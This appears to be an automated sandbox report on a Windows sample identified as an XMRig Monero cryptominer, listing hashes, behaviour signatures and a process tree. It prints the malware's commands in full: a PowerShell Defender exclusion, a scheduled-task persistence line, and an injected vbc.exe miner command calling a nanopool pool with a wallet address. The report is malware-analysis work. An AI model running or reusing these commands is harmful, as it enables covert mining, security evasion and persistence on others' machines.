Analysis
-
max time kernel
166s -
max time network
150s -
platform
windows7_x64 -
resource
win7-20221111-en -
resource tags
arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system -
submitted
23-11-2022 14:35
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20221111-en
General
-
Target
file.exe
-
Size
1.3MB
-
MD5
8851bd99bb8728fa34a8a7afce73b36e
-
SHA1
d9a7790e4f41673f6a484180c717c778b258308e
-
SHA256
66d3e2e7a164f88efb1aecc3c81dbf1d29590a0e852f7dcebda595467027ab3d
-
SHA512
ff8b2a5ce027aef8f046c22fb77d4448d3f6fc4c0a117e9cb1b08b16d9e993a3c74846428974cc56f754b73d41b9a15863b9e5bc7c776b7a859d073d7e145f6f
-
SSDEEP
24576:n8E0T8wpeIq79Bu+pj+SRLQdqJptmfXCFIif/:nZ0TbpeIq7HumRLQkJpoKFIif
Malware Config
Signatures
-
XMRig Miner payload 7 IoCs
Processes:
resource yara_rule behavioral1/memory/1296-146-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/1296-148-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/1296-150-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/1296-151-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/1296-161-0x0000000140343234-mapping.dmp xmrig behavioral1/memory/1296-165-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/1296-167-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig -
Executes dropped EXE 1 IoCs
Processes:
OWT.exepid process 552 OWT.exe -
Loads dropped DLL 1 IoCs
Processes:
cmd.exepid process 904 cmd.exe -
Uses the VBS compiler for execution 1 TTPs
-
Suspicious use of SetThreadContext 1 IoCs
Processes:
OWT.exedescription pid process target process PID 552 set thread context of 1296 552 OWT.exe vbc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 840 timeout.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exepowershell.exeOWT.exepid process 1020 powershell.exe 1212 powershell.exe 552 OWT.exe 552 OWT.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 460 -
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
file.exepowershell.exeOWT.exepowershell.exevbc.exedescription pid process Token: SeDebugPrivilege 960 file.exe Token: SeDebugPrivilege 1020 powershell.exe Token: SeDebugPrivilege 552 OWT.exe Token: SeDebugPrivilege 1212 powershell.exe Token: SeLockMemoryPrivilege 1296 vbc.exe Token: SeLockMemoryPrivilege 1296 vbc.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
vbc.exepid process 1296 vbc.exe -
Suspicious use of WriteProcessMemory 36 IoCs
Processes:
file.execmd.exeOWT.execmd.exedescription pid process target process PID 960 wrote to memory of 1020 960 file.exe powershell.exe PID 960 wrote to memory of 1020 960 file.exe powershell.exe PID 960 wrote to memory of 1020 960 file.exe powershell.exe PID 960 wrote to memory of 904 960 file.exe cmd.exe PID 960 wrote to memory of 904 960 file.exe cmd.exe PID 960 wrote to memory of 904 960 file.exe cmd.exe PID 904 wrote to memory of 840 904 cmd.exe timeout.exe PID 904 wrote to memory of 840 904 cmd.exe timeout.exe PID 904 wrote to memory of 840 904 cmd.exe timeout.exe PID 904 wrote to memory of 552 904 cmd.exe OWT.exe PID 904 wrote to memory of 552 904 cmd.exe OWT.exe PID 904 wrote to memory of 552 904 cmd.exe OWT.exe PID 552 wrote to memory of 1212 552 OWT.exe powershell.exe PID 552 wrote to memory of 1212 552 OWT.exe powershell.exe PID 552 wrote to memory of 1212 552 OWT.exe powershell.exe PID 552 wrote to memory of 1720 552 OWT.exe cmd.exe PID 552 wrote to memory of 1720 552 OWT.exe cmd.exe PID 552 wrote to memory of 1720 552 OWT.exe cmd.exe PID 1720 wrote to memory of 1304 1720 cmd.exe schtasks.exe PID 1720 wrote to memory of 1304 1720 cmd.exe schtasks.exe PID 1720 wrote to memory of 1304 1720 cmd.exe schtasks.exe PID 552 wrote to memory of 1296 552 OWT.exe vbc.exe PID 552 wrote to memory of 1296 552 OWT.exe vbc.exe PID 552 wrote to memory of 1296 552 OWT.exe vbc.exe PID 552 wrote to memory of 1296 552 OWT.exe vbc.exe PID 552 wrote to memory of 1296 552 OWT.exe vbc.exe PID 552 wrote to memory of 1296 552 OWT.exe vbc.exe PID 552 wrote to memory of 1296 552 OWT.exe vbc.exe PID 552 wrote to memory of 1296 552 OWT.exe vbc.exe PID 552 wrote to memory of 1296 552 OWT.exe vbc.exe PID 552 wrote to memory of 1296 552 OWT.exe vbc.exe PID 552 wrote to memory of 1296 552 OWT.exe vbc.exe PID 552 wrote to memory of 1296 552 OWT.exe vbc.exe PID 552 wrote to memory of 1296 552 OWT.exe vbc.exe PID 552 wrote to memory of 1296 552 OWT.exe vbc.exe PID 552 wrote to memory of 1296 552 OWT.exe vbc.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:960 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1020 -
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\tmpA8ED.tmp.bat""2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:904 -
C:\Windows\system32\timeout.exetimeout 33⤵
- Delays execution with timeout.exe
PID:840 -
C:\ProgramData\winrar\OWT.exe"C:\ProgramData\winrar\OWT.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:552 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1212 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "OWT" /tr "C:\ProgramData\winrar\OWT.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:1720 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "OWT" /tr "C:\ProgramData\winrar\OWT.exe"5⤵
- Creates scheduled task(s)
PID:1304 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero4⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1296
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.3MB
MD58851bd99bb8728fa34a8a7afce73b36e
SHA1d9a7790e4f41673f6a484180c717c778b258308e
SHA25666d3e2e7a164f88efb1aecc3c81dbf1d29590a0e852f7dcebda595467027ab3d
SHA512ff8b2a5ce027aef8f046c22fb77d4448d3f6fc4c0a117e9cb1b08b16d9e993a3c74846428974cc56f754b73d41b9a15863b9e5bc7c776b7a859d073d7e145f6f
-
Filesize
1.3MB
MD58851bd99bb8728fa34a8a7afce73b36e
SHA1d9a7790e4f41673f6a484180c717c778b258308e
SHA25666d3e2e7a164f88efb1aecc3c81dbf1d29590a0e852f7dcebda595467027ab3d
SHA512ff8b2a5ce027aef8f046c22fb77d4448d3f6fc4c0a117e9cb1b08b16d9e993a3c74846428974cc56f754b73d41b9a15863b9e5bc7c776b7a859d073d7e145f6f
-
Filesize
138B
MD505013e4ae014806749d76405572c30f9
SHA12b53081e377ed8beb5ebe23d861861a2a1d8b7f5
SHA25650e41c5786843f5d98118a283ec938dc24a8433fbdbd6c6d5db4c15a9843b134
SHA5127aecc155f07feaac85f60401d571f9c0c6223a96c7e0f7717908adf7c72b984a45ae7d00da4c151c5b9b7d72d2f4515fdd02ea5f24550ed93b1429e822bc5650
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5c5ee1e447266db67e45e6b0ea112a2ae
SHA17307eebcabec0c7e7ed41b4237df1978d13b978a
SHA256929fcaca80638b4e9a08d9d86f03c184c2f805c6748a9e05941e6d0e7b4280c6
SHA5126dbfac3f42a0fd5af872a4a06fe7a0a940c31e632d07cd1ae14c89de9b7acad34585e8be93c7ee77e7a277056939c9e24469cd350b7dde2fc0c93e07f4068ca3
-
Filesize
1.3MB
MD58851bd99bb8728fa34a8a7afce73b36e
SHA1d9a7790e4f41673f6a484180c717c778b258308e
SHA25666d3e2e7a164f88efb1aecc3c81dbf1d29590a0e852f7dcebda595467027ab3d
SHA512ff8b2a5ce027aef8f046c22fb77d4448d3f6fc4c0a117e9cb1b08b16d9e993a3c74846428974cc56f754b73d41b9a15863b9e5bc7c776b7a859d073d7e145f6f